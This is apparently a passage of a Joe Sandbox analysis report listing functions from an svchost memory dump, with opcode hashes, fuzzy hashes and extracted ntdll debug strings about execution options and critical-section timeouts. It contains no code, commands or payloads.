                                                • Instruction Fuzzy Hash: 51216936100B50DFC721EF68CA41F19BBB5FF18748F1A4968E40ADBAA1C734E910EB44
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                • Instruction ID: 79f3aaedb7a8b465795239431ecbc90d82aac5a3843aa8395792b261d8fb5681
                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                • Instruction Fuzzy Hash: C311EF76604714BFD722DF85CC80FAABBB8EB80754F150029EA01EF180D676EE44DB60
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e51d3cc6a95cbc97f25b591a414704ff124dfc185160a38a2752dfef3afbfd8
                                                • Instruction ID: 8cb1c64f987e00113935c51753b20611786dd810b9ca04f982739bc253d2492e
                                                • Opcode Fuzzy Hash: 0e51d3cc6a95cbc97f25b591a414704ff124dfc185160a38a2752dfef3afbfd8
                                                • Instruction Fuzzy Hash: 99119D366007209BCB11CF59C480A6AF7EAAF4B750B198069FD08DF205D6B2EA0587A0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c00b2979cee78422589e73190f40291aa602f1b522ef73cb05ca76f8117a8cf3
                                                • Instruction ID: 34bf41746177b0029fa73b41e0f700f485751f5745eabdb2579ea796fd50c5d4
                                                • Opcode Fuzzy Hash: c00b2979cee78422589e73190f40291aa602f1b522ef73cb05ca76f8117a8cf3
                                                • Instruction Fuzzy Hash: A8210779A003488BE725DF5DC5487EDB7B4FB8A318F2D8018C811DB2D0CBB89A45CB50
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 30dcca66137ef2276ed95199b2e6707e49d37b17252db808dc964d1e8b2b7be8
                                                • Instruction ID: 84826ca0f325f18bf7fd52bfbd9749b84de35f61435ddb4f8250a0f006d6b03b
                                                • Opcode Fuzzy Hash: 30dcca66137ef2276ed95199b2e6707e49d37b17252db808dc964d1e8b2b7be8
                                                • Instruction Fuzzy Hash: A0215E75A00205DFCB14CF99C581AAEBBB5FB89314F24416DE105EB350C772AE0ACBD0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 148937d03ba7c441f10769c27e4fda6e5432889d6a4c8982593179ba9f6183ae
                                                • Instruction ID: 845c494c502a3506b526fce0f5a4d5dc361e75d4b006c9b5069de135b4ec27fe
                                                • Opcode Fuzzy Hash: 148937d03ba7c441f10769c27e4fda6e5432889d6a4c8982593179ba9f6183ae
                                                • Instruction Fuzzy Hash: 69215675611B00EFC720DF69C881B66B3F8FF84250F44882DE5AACB650DA70AD60DBA0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c85dae548149101cf856714e7dff0bc2c8dfbb6b59ab697cc238b8eb4ce4dc0f
                                                • Instruction ID: d6501194c4f197e5688c8505e78efc7c54c0b4032946b35b9c91651946f318dd
                                                • Opcode Fuzzy Hash: c85dae548149101cf856714e7dff0bc2c8dfbb6b59ab697cc238b8eb4ce4dc0f
                                                • Instruction Fuzzy Hash: 2211E27F010640EAD730FF56D901A727BA8EBB4B84F144065E800DB358E738DE01CB64
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 32755500ce7151faa8850d394bd09d3b4547de4b35fd8aad6018725e3309bbe7
                                                • Instruction ID: 7b6e3cd28f0ba25faa3acc23b8e4be216cb1aa7f326c0eafae0b4d01cd0efe48
                                                • Opcode Fuzzy Hash: 32755500ce7151faa8850d394bd09d3b4547de4b35fd8aad6018725e3309bbe7
                                                • Instruction Fuzzy Hash: 6F11CE76A01344EFCB24DF59D5C0A5ABBE8EF94650F1A8079E905DF310DA70DE10CBA0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 914b6323b2efa39914e25e9993f52a19d517a3f8de8c3e0d3f59ceec9a00deac
                                                • Instruction ID: 216285a4be265a4151c83fff3c8e58c0bd757b409737cee5fba9f7763617fca9
                                                • Opcode Fuzzy Hash: 914b6323b2efa39914e25e9993f52a19d517a3f8de8c3e0d3f59ceec9a00deac
                                                • Instruction Fuzzy Hash: 3D01043B605684ABE316E2AA9888F27B6DCEF80354F0A0465F800CF641DA14DC00C2A5
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fd725b15f23d3c654f1db45f53ca4294ed68f3d55b07656975ebf8e0ad7d5a23
                                                • Instruction ID: fc9ceae544f2f69cfe9e299b11b543f30f60e535ea48e82adb84b581e6f3c20e
                                                • Opcode Fuzzy Hash: fd725b15f23d3c654f1db45f53ca4294ed68f3d55b07656975ebf8e0ad7d5a23
                                                • Instruction Fuzzy Hash: 3901D6B6B04300ABD710EBBA9C81F6BBAF8EFD4314F050029FA05CB141EA70ED409625
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                • Instruction ID: 76ec125fc5d8741fa727e076ca71cc5ce99205ccb6eb4bdf0fd5a3d796dda9c4
                                                • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                • Instruction Fuzzy Hash: 19F09675A11355EBEF14D7AA8980FAFF7A8DF84614F098995BD02DF144DA30FA40C750
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4070539b45f2717402b3023c05403c2f87b50ef0fbaa2709fc0efa38ebb026f1
                                                • Instruction ID: 41bff678cdc840568f096a8fc115a4260d9f0915d3082d71f33bce6fad78f5fd
                                                • Opcode Fuzzy Hash: 4070539b45f2717402b3023c05403c2f87b50ef0fbaa2709fc0efa38ebb026f1
                                                • Instruction Fuzzy Hash: 9E011A74E00249DFDB04DFA9D545B9EF7F4FF08700F14826AA919EB381EA74DA409B91
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b3a6d9c3d5c75bc077576970c6219c012e9ede7d3ffe6639efe9082a92e1d67
                                                • Instruction ID: 10265be51b24358084e350df41fcd1d23b15f28d516339f405fe2205f2168a86
                                                • Opcode Fuzzy Hash: 9b3a6d9c3d5c75bc077576970c6219c012e9ede7d3ffe6639efe9082a92e1d67
                                                • Instruction Fuzzy Hash: CAF024B12043645BE715E659DC02B663A9AEBC0691F29C06AEB05CF2C0EA72ED018394
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                • Instruction ID: 2bf996a49921f59dffdb83d649b5123512b22de7b96cd5e21e86941ae823221b
                                                • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                • Instruction Fuzzy Hash: C3F04FBA940304BFE711EBA4CD41FDA77BCEB44710F100166BA56DA1D0EA70EE44DB94
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                • Instruction ID: 7f7e34b023ffe957f92d17a240371a5d1c9bba870f73867d0663f4660b44c3c6
                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                • Instruction Fuzzy Hash: 3FF08939781B1247D77DEA6F9450B2EE2559F80A50B4E052CB755CFE40DF70DD019790
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e71f9e3882bf2489dd2d190bd5623927570bdc043e764ca1e02bb36d7499d2b9
                                                • Instruction ID: 7bb7f88231ea0c698ed9947c8040f0871027b44499e344f72297382d5ff6040c
                                                • Opcode Fuzzy Hash: e71f9e3882bf2489dd2d190bd5623927570bdc043e764ca1e02bb36d7499d2b9
                                                • Instruction Fuzzy Hash: BBF03775A01248EFCB04EFA9D545A9EBBF4EF48300F41806AF945EB381E674EA01DB55
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ec8e277f02e0223f1a736a43a1bfc908c28a2f43687de11755cf8b962589e4f6
                                                • Instruction ID: 2e535e86e640714cae0b00c5c508827b6a0855224c42756e374de0d2cd0592ee
                                                • Opcode Fuzzy Hash: ec8e277f02e0223f1a736a43a1bfc908c28a2f43687de11755cf8b962589e4f6
                                                • Instruction Fuzzy Hash: D9F0FA32200340ABC731EB09CC04F9ABBEDEF84B00F090129A942C7190C7B0AA08C660
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8e3ed25cce3a2bfda0612dbc7c089ca6128d1d009c14704db575f41160f9019d
                                                • Instruction ID: 82c0c06972175104a612fa73df2a256189eccf1ccb111a06379035209f02ba8f
                                                • Opcode Fuzzy Hash: 8e3ed25cce3a2bfda0612dbc7c089ca6128d1d009c14704db575f41160f9019d
                                                • Instruction Fuzzy Hash: FAF0B43B9127D09FD736CB5BC444B21B7D9DB02764F0D89AAD889CF541C724DA81CA52
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c03e82ba3f75d433e4eccd0efd73df8e2b851d11c1f21e4339c60b0e06b15b10
                                                • Instruction ID: d3ec34f0c0f002a71075cccda420fceaf5ebe104d0f7b70480902f54c0abdeb3
                                                • Opcode Fuzzy Hash: c03e82ba3f75d433e4eccd0efd73df8e2b851d11c1f21e4339c60b0e06b15b10
                                                • Instruction Fuzzy Hash: 1EF06D79A10388EBDB04EFA9D805EAEBBF4EF48304F014069E901EB381E674DA00DB54
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 628f4e59559a59d0ea87436b5ae6e88029c9800bd386d66f48bf7349f6db4c6f
                                                • Instruction ID: 849fd5fffcf5e33dd4ba1289e7d97ca17ecdd8f02cb5d4ca63eeda070dbb4d73
                                                • Opcode Fuzzy Hash: 628f4e59559a59d0ea87436b5ae6e88029c9800bd386d66f48bf7349f6db4c6f
                                                • Instruction Fuzzy Hash: 12F027BB41A7E04ECF71FB286850391BF689762810F1E5089C6A1DF306C9B5C683C620
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db965e963c3a7328d842496dbdecf226c5bd855adb4139d26c8bfa48f74c256e
                                                • Instruction ID: 7bba370ebbc72b94a95092e80edf4eba6f4709141e2ba81da4ff0940410dc4c0
                                                • Opcode Fuzzy Hash: db965e963c3a7328d842496dbdecf226c5bd855adb4139d26c8bfa48f74c256e
                                                • Instruction Fuzzy Hash: C7F09A74E10348EBDB04EBB9E445BAEB7B4EB08600F108059A901EB280DAB4D9019B24
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d7a2968ef1b5899ba30c21365a63d928fc8e7ccf21dce8e29e06548bb03c514
                                                • Instruction ID: ded371e07e1748941e691deec43cc4bca7c56cff267a7c622fcafeac880bfe34
                                                • Opcode Fuzzy Hash: 9d7a2968ef1b5899ba30c21365a63d928fc8e7ccf21dce8e29e06548bb03c514
                                                • Instruction Fuzzy Hash: FCF0BE74A10388ABDB04EFB9E905E6EB7B4FF14700F044059A801EB2C0EA74D900DB54
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 12f0ab0c003108f49b16120f664dd0bb9119ea8cb249ca7f88dd299e054ccd7a
                                                • Instruction ID: f83c39e30eaada003709eb97964c0163f681bc15705a4c308b76dcdf4cefb105
                                                • Opcode Fuzzy Hash: 12f0ab0c003108f49b16120f664dd0bb9119ea8cb249ca7f88dd299e054ccd7a
                                                • Instruction Fuzzy Hash: 75F0BE78A10348EFDB04EBB9E905FAEB7B4FF04700F004459A841EB3C1EA74DA009B54
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7e84d68ba4e24a1beb774b95633ff2e910463e9f4746b1619f8e0559867b28d
                                                • Instruction ID: 800551065526d0bbd28660149b07a6e8a5caeb93abc95094fca58fce0a0908e7
                                                • Opcode Fuzzy Hash: d7e84d68ba4e24a1beb774b95633ff2e910463e9f4746b1619f8e0559867b28d
                                                • Instruction Fuzzy Hash: 16F02774E0434DEBCB04EBB9E845E9EB7B4EF09700F100059E801EB3D0EA74D9009714
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1febe9a29e817114b347e1798c5b18e3e55451a9cb4a4455448346f185f5fd1
                                                • Instruction ID: b5deb4219d9a6fe05607c887b2fdc8303a372903088216600866b280c831869b
                                                • Opcode Fuzzy Hash: b1febe9a29e817114b347e1798c5b18e3e55451a9cb4a4455448346f185f5fd1
                                                • Instruction Fuzzy Hash: C0F020B1911A869FC722E72EC0C4F22B3E99F00B78F0D84A0D809CF701CBA8D980C290
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ef1b5205e17e6b4cba9483183e2f2624dd854ba19d7616f05c8b5c79df4cdd21
                                                • Instruction ID: 56dfea8232f35617044c5582f6a18dc9be27d963a23747c4f01d63d80567c699
                                                • Opcode Fuzzy Hash: ef1b5205e17e6b4cba9483183e2f2624dd854ba19d7616f05c8b5c79df4cdd21
                                                • Instruction Fuzzy Hash: 4BF08274A14348ABDB14EBB9E905F6EB7B8EF44704F050459A901EB2C1EA74DA009759
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09ad0b0c6c8f3688280cbf6112972ab17eb58a3732f44c69fd1aa3f4e44a012a
                                                • Instruction ID: 182c71e739b34bfeb4df7ec9519b3ddee5cb5b91be06e3327e5d5d33248f8de3
                                                • Opcode Fuzzy Hash: 09ad0b0c6c8f3688280cbf6112972ab17eb58a3732f44c69fd1aa3f4e44a012a
                                                • Instruction Fuzzy Hash: 3DF08274A14248EBDB04EBB9E905F6EB7B4FF04704F050059A941EB2C1EA74E900DB59
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                • Instruction ID: 1854dab4fd8da43b96068a412b3b0fa7e9e44bcbea6b8286ab9e1621e10e0914
                                                • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                • Instruction Fuzzy Hash: A1F0E53360471467C230AA0D8C09F5BFBACDBD5B70F10431ABA24DB1D0DA70A911D7D6
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7bbf317355bd7ee605832070697460d22e264af68120c8a0ebecc8e987d73070
                                                • Instruction ID: 8ab750c49cdb7cd595c22baa4f9886dd8be943df51a8d57e4e8f42c7df597337
                                                • Opcode Fuzzy Hash: 7bbf317355bd7ee605832070697460d22e264af68120c8a0ebecc8e987d73070
                                                • Instruction Fuzzy Hash: A3F0A775A10348EBDB04EBB9D559E9E77B4EF08704F060059E541EF3C0D974D901A759
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                • Instruction ID: 87a12ad40f9cf34ee92673e01622df3132510b56eeeac4861ce5204a6ca8c130
                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                • Instruction Fuzzy Hash: 79F06D3E3047949BDB16DF2AD050AA57BA8EB46364B0500D9E846CF351EB31EAC2CB94
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                • Instruction ID: 52cc8818afe91b07db853a3a64a24060d7a3d10607d524bb6d8fb5902960521f
                                                • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                • Instruction Fuzzy Hash: 21E06D76210200AFE764DB58CD05FA673ACEB40B60F150258B515D70D0DBB0AE40CA60
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                • Instruction ID: 9483c06bde7a0abe31757ea4d27738c16b90deff60aff492d2c210f91666726c
                                                • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                • Instruction Fuzzy Hash: D0E0C2343043058FD719CF1AD080BA2B7B6BFD5A10F28C068A848CF206EB32E942CB40
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                • Instruction ID: 7ecc973c1769ec0f2cbfe555df3d60c60431597a215ed0e215d2c2cbb7eaf25f
                                                • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                • Instruction Fuzzy Hash: E3E0CD35244314B7DB22AA40CC00F797B15DB407D0F118031FB08DE650C5719D51E6D4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                Strings
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03CA4742
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03CA46FC
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03CA4655
                                                • Execute=1, xrefs: 03CA4713
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 03CA4787
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03CA4725
                                                • ExecuteOptions, xrefs: 03CA46A0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03CA02E7
                                                • RTL: Re-Waiting, xrefs: 03CA031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03CA02BD
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03CA7B7F
                                                • RTL: Resource at %p, xrefs: 03CA7B8E
                                                • RTL: Re-Waiting, xrefs: 03CA7BAC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
